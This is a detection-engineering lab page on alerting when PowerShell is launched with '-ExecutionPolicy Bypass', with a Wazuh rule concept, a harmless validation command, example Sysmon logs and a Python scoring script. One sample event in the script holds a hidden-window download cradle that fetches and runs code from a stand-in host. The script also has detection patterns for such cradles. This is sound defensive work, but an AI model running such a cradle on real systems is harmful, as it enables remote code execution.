Phase 1·T1059.001·Easy

Detecting -ExecutionPolicy Bypass

Catch attempts to neutralize ExecutionPolicy from the command line.

#Windows #PowerShell

Detection Objective

Alert on -ExecutionPolicy Bypass/Unrestricted in process command lines.

Real-World Attack Scenario

Attackers force-disable script policy to run unsigned payloads.

Why This Detection Matters

Ubiquitous in malicious scripts, infrequent in clean environments.

ATT&CK Mapping

T1059.001 · PowerShell
Tactic: Execution

Required Telemetry

  • Sysmon EID 1
Windows Event IDs: 4688
Sysmon Event IDs: 1
Wazuh Log Source: Sysmon/Operational

Setup Steps

  1. Enable Sysmon EID 1 with command-line logging.

Safe Validation Command

Run a harmless script with bypass.
powershell.exe -ExecutionPolicy Bypass -Command "Write-Host detection-test"
⚠ lab use only · this project does not execute real malware

Expected Log Output

Sysmon EID 1
CommandLine: powershell.exe -ExecutionPolicy Bypass -Command ...

Detection Logic (Wazuh rule concept)

CommandLine matches /(?i)-ex(ecutionpolicy)?\s+(bypass|unrestricted)/

False Positives

  • Vendor installers

Tuning Recommendations

  • Allowlist signed installers and known IT scripts.

Analyst Triage Notes

  • Inspect script payload and parent.

Detection Improvement Ideas

  • Correlate with file-write events for new .ps1 files.

log analysis layer

Detection is not complete until the logs prove what happened. The sections below show the telemetry produced by the validation above, how to read it like an analyst, and why this pattern matters.

siem · log evidence
rule 100639 · Detecting -ExecutionPolicy Bypass · Sysmon/Operational
Event ID: Sysmon EID 1
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent: C:\Windows\explorer.exe
CommandLine: powershell.exe -ExecutionPolicy Bypass -Command "Write-Host detection-test"
User: CORP\j.doe
Agent: WIN10-LAB-01
Timestamp: 2026-05-26T14:32:11Z
analyst note: Inspect script payload and parent.

Parent → Child Analysis

explorer.exe → powershell.exe — review whether this lineage is expected for WIN10-LAB-01 and user CORP\j.doe.

Command-Line Flags Observed

  • -ExecutionPolicy Bypass
    Neutralizes script-policy controls so unsigned code can run.

Parsed Fields the Analyst Reads

  • Image: Process binary that executed — confirms PowerShell.
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  • ParentImage: Who launched it — context for legitimacy.
    C:\Windows\explorer.exe
  • CommandLine: Arguments — where attacker intent shows up.
    powershell.exe -ExecutionPolicy Bypass -Command "Write-Host detection-test"
  • User: Account context — service vs interactive vs SYSTEM.
    CORP\j.doe
  • EventID: Telemetry channel and event type.
    Sysmon EID 1
  • Wazuh Rule ID: Rule that matched and produced this alert.
    100639
  • Agent: Endpoint that produced the telemetry.
    WIN10-LAB-01
  • Timestamp: When it happened — anchor for correlation.
    2026-05-26T14:32:11Z

Malicious Pattern

pattern: -ExecutionPolicy Bypass
description: Attackers force-disable script policy to run unsigned payloads.
analyst takeaway: Ubiquitous in malicious scripts, infrequent in clean environments. Treat this signal as higher-risk when combined with suspicious parents, hidden windows, download cradles, or unusual user context.
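As an added example that is not the project's own rule code, the following Python scores constructed Sysmon EID 1 events with the rule concept from the Detection Logic section, the allowlist tuning, and the risk-raising context from the analyst takeaway above. It goes beyond the page's regex by also accepting the -ex/-ep short forms and prefixes such as -exec, which powershell.exe accepts for -ExecutionPolicy; the allowlisted and expected parent paths and the sample events are assumptions constructed for the example.

```python
import re

# Rule 100639 concept from the page, widened (assumption) to the documented
# short forms -ex / -ep and prefixes such as -exec, which powershell.exe accepts.
BYPASS_RE = re.compile(r"(?i)-e(?:x\w*|p)\s+(?:bypass|unrestricted)")

# Tuning from the page: allowlist signed installers / known IT scripts.
# Parent paths are constructed examples, not a real baseline.
ALLOWLISTED_PARENTS = {r"c:\program files\vendor\setup.exe"}
EXPECTED_PARENTS = {r"c:\windows\explorer.exe", r"c:\windows\system32\cmd.exe"}

# Context from the analyst takeaway that raises risk: hidden window, download cradle.
RISK_PATTERNS = {
    "hidden_window": re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"),
    "download_cradle": re.compile(r"(?i)downloadstring|invoke-webrequest|\biwr\b"),
}

def evaluate(event):
    """Return an alert dict for a Sysmon EID 1 event dict, or None if the rule is silent."""
    cmd = event["CommandLine"]
    if not BYPASS_RE.search(cmd):
        return None
    parent = event["ParentImage"].lower()
    if parent in ALLOWLISTED_PARENTS:
        return None  # tuned out: signed installer / known IT script
    flags = [name for name, rx in RISK_PATTERNS.items() if rx.search(cmd)]
    if parent not in EXPECTED_PARENTS:
        flags.append("unusual_parent")  # lineage the analyst should review
    return {"rule": 100639, "severity": "high" if flags else "medium",
            "flags": flags, "parent": event["ParentImage"], "user": event["User"]}

# Constructed Sysmon EID 1 events: the page's validation command, a suspicious
# variant, a tuned-out vendor installer, and a clean interactive session.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"Image": PS, "ParentImage": r"C:\Windows\explorer.exe", "User": r"CORP\j.doe",
     "CommandLine": 'powershell.exe -ExecutionPolicy Bypass -Command "Write-Host detection-test"'},
    {"Image": PS, "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "User": r"CORP\j.doe",
     "CommandLine": 'powershell.exe -ep bypass -w hidden -c "iex (iwr http://example.invalid/s)"'},
    {"Image": PS, "ParentImage": r"C:\Program Files\Vendor\setup.exe", "User": r"NT AUTHORITY\SYSTEM",
     "CommandLine": r"powershell.exe -ExecutionPolicy Unrestricted -File C:\Temp\install.ps1"},
    {"Image": PS, "ParentImage": r"C:\Windows\explorer.exe", "User": r"CORP\j.doe",
     "CommandLine": "powershell.exe -NoProfile -Command Get-Date"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(evaluate(ev))
```

The validation command scores medium with no flags, the Office-spawned hidden-window cradle scores high, and the allowlisted installer and the clean session produce no alert.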

proof the detection worked

test command: powershell.exe -ExecutionPolicy Bypass -Command "Write-Host detection-test"
expected event: Sysmon EID 1 on WIN10-LAB-01 with Image=powershell.exe and the validation command above in CommandLine.
expected wazuh alert: Wazuh rule 100639 — "Detecting -ExecutionPolicy Bypass" fires at a level matching severity=medium.
confirming log fields: Image, ParentImage, CommandLine, User, EventID
analyst interpretation: The recorded fields satisfy every clause of the detection logic. Parent process, user context, and command-line arguments together prove the behavior was observed end to end.
conclusion: Detection succeeded: telemetry was captured, the rule matched, and the alert reached the analyst with enough context to triage.